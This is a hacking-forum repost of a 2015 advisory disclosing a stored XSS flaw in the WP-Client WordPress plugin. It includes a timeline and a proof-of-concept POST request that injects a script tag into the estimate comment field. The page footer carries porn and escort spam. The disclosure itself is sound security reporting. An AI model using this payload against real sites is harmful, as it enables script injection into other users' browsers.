KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WP-Client 3.8.7 - Stored XSS Vulnerability
Konu : WP-Client 3.8.7 - Stored XSS Vulnerability - 28.11.2015, 10:03
Mesaj: #1
Kod:
#####################################################################################
 
Application: WP-Client
 
Version: 3.8.7
 
Author: Pier-Luc Maltais from COSIG
 
Twitter: @COSIG_
 
#####################################################################################
 
1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################
 
===============
1) Introduction
===============
One plugin configures multiple areas of your WordPress installation and allows the
site Administrator to easily create new Client Areas, Client Management Portals,
Client Estimates & Invoices, Client File Upload Areas, or Private Staff Pages on the
site by entering  just a few data fields. Additionally, clients can upload/download
secure files. (https://wp-client.com/)

 
============================
2) Report Timeline
============================
12/11/2015 - Found the vulnerability
12/11/2015 - Ticket opened
20/11/2015 - Plugin extension Estimates/Invoices updated (v1.5.2)
24/11/2015 - Public disclosure
 
 
============================
3) Technical details
============================
WP-Client is vulnerable to a stored XSS attack in the Request Estimate page. The
extension affected is Estimates/Invoices v1.5.1.


============================
4) POC
============================
Request :

POST /portal/request-estimate/ HTTP/1.1
[...]
wpc_data%5Baction%5D=request&wpc_data%5Btitle%5D=Request+Estimate+from+2015-11-12&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bname%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bdescription%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bquantity%5D=1&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bprice%5D=&wpc_data%5Bwpc_inv_message%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
 
Response :

[...]
<div class="wpc_clear"></div>
   <span>Comments:</span><br>
   <table id="wpc_inv_table_request_notes" style="width: 100%;">
       <tr bgcolor="E0E0E0">
           <td><b>client:</b></td>
           <td><script>alert(1)</script>
[...]

#####################################################################################
Helper, üyesi illegalizm | Private illegal Topluluk - Hack forum,Warez Scriptler forumlarına 29.06.2015 tarihinde katılmıştır.

(Son Düzenleme: 28.11.2015, 10:05, Düzenleyen: Helper.)
WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno